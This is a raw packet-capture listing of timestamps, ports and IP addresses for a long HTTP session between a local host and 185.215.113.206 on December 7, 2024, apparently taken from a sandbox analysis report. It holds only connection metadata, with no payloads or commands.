Dec 7, 2024 10:51:53.344743967 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.344789982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.344830036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.344871998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.345629930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.345721960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.345741987 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.345773935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.346564054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.346625090 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.346654892 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.346693039 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.347568035 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.347609997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.347620964 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.347649097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.348360062 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.348402977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.348557949 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.348608017 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.349268913 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.349359989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.349376917 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.349420071 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.350178003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.350245953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.350269079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.350313902 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.351125002 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.351181030 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.351190090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.351236105 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.351979017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.352024078 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.464222908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.464289904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.464386940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.464432001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.464724064 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.464766979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.464929104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.464993954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.465027094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.465034962 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.465805054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.465866089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.465902090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.465943098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.466692924 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.466753006 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.466763973 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.466806889 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.467641115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.467689037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.467716932 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.467758894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.468529940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.468590021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.468612909 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.468655109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.469540119 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.469583988 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.469803095 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.469857931 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.470541954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.470593929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.470643044 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.470700979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.471335888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.471390963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.471446037 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.471493959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.472234011 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.472282887 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.472333908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.472378969 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.473160028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.473216057 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.473273039 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.473318100 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.473870993 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.473926067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.474071026 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.474122047 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.475055933 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.475111961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.475116968 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.475153923 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.475708008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.475759983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.475812912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.475855112 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.476619005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.476666927 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.476727962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.476772070 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.477531910 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.477588892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.477612972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.477652073 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.478401899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.478454113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.512135029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.512206078 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.512280941 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.512321949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.512489080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.512532949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.512626886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.512665987 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.513434887 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.513479948 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.513535976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.513600111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.514394045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.514436007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.514478922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.514513969 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.515243053 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.515294075 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.515326023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.515367031 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.516120911 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.516168118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.516288996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.516330957 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.517142057 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.517194986 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.517235041 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.517276049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.518028975 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.518086910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.518121004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.518165112 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.518862963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.518906116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.518975019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.519010067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.519886971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.519932985 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.519998074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.520035028 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.520684958 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.520734072 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.520859003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.520899057 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.521608114 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.521660089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.521934986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.521979094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.522701979 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.522744894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.522814035 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.522847891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.523456097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.523499966 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.523605108 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.523648977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.524323940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.524373055 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.524436951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.524477005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.525228977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.525294065 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.525316000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.525358915 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.526144028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.526210070 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.526220083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.526257992 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.527031898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.527086020 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.527132034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.527172089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.527925014 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.527980089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.528053999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.528099060 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.528855085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.528898001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.528963089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.529002905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.529721022 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.529773951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.529875994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.529920101 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.530639887 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.530684948 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.530739069 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.530777931 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.531610966 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.531661034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.531712055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.531748056 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.532484055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.532556057 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.532582998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.532623053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.533370018 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.533422947 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.533477068 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.533520937 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.534351110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.534416914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.534442902 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.534482002 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.535260916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.535274029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.535341978 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.536134958 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.536214113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.536222935 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.536264896 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.537065983 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.537120104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.537194014 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.537242889 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.538022995 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.538069010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.538078070 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.538111925 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.538803101 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.538850069 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.538865089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.538908958 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.539736032 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.539788008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.539927006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.539977074 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.540622950 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.540683031 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.540739059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.540780067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.541518927 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.541580915 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.541642904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.541676044 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.542412043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.542465925 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.542480946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.542515993 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.543345928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.543405056 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.543430090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.543483019 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.544224977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.544285059 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.627583981 CET	443	49834	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.628245115 CET	49834	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:53.628261089 CET	443	49834	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.628794909 CET	49834	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:53.628799915 CET	443	49834	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.636719942 CET	443	49835	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.637908936 CET	49835	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:53.637934923 CET	443	49835	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.638652086 CET	49835	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:53.638669968 CET	443	49835	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:53.656528950 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.656593084 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.656706095 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.656749010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.656950951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.656999111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.657032013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.657071114 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.657876015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.657922983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.657947063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.657989025 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.658983946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.659039021 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.659039021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.659082890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.659843922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.659904003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.659944057 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.659987926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.660794973 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.660847902 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.660931110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.660973072 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.661628008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.661681890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.661711931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.661756992 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.662368059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.662431955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.662487984 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.662530899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.663292885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.663343906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.663439035 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.663482904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.664251089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.664400101 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.664429903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.664683104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.665102959 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.665153980 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.665196896 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.665237904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.666049004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.666100979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.666146040 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.666184902 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.666925907 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.666982889 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.667064905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.667115927 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.667819977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.667880058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.667927027 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.667963028 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.668740034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.668778896 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.668828964 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.668864012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.669687986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.669728994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.669799089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.669843912 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.670531034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.670555115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.670578003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.670619011 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.704361916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.704421997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.704449892 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.704492092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.704798937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.704848051 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.704901934 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.704938889 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.705797911 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.705852985 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.705995083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.706048012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.706677914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.706722021 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.706722975 CET	49808	80	192.168.2.6	185.215.113.206
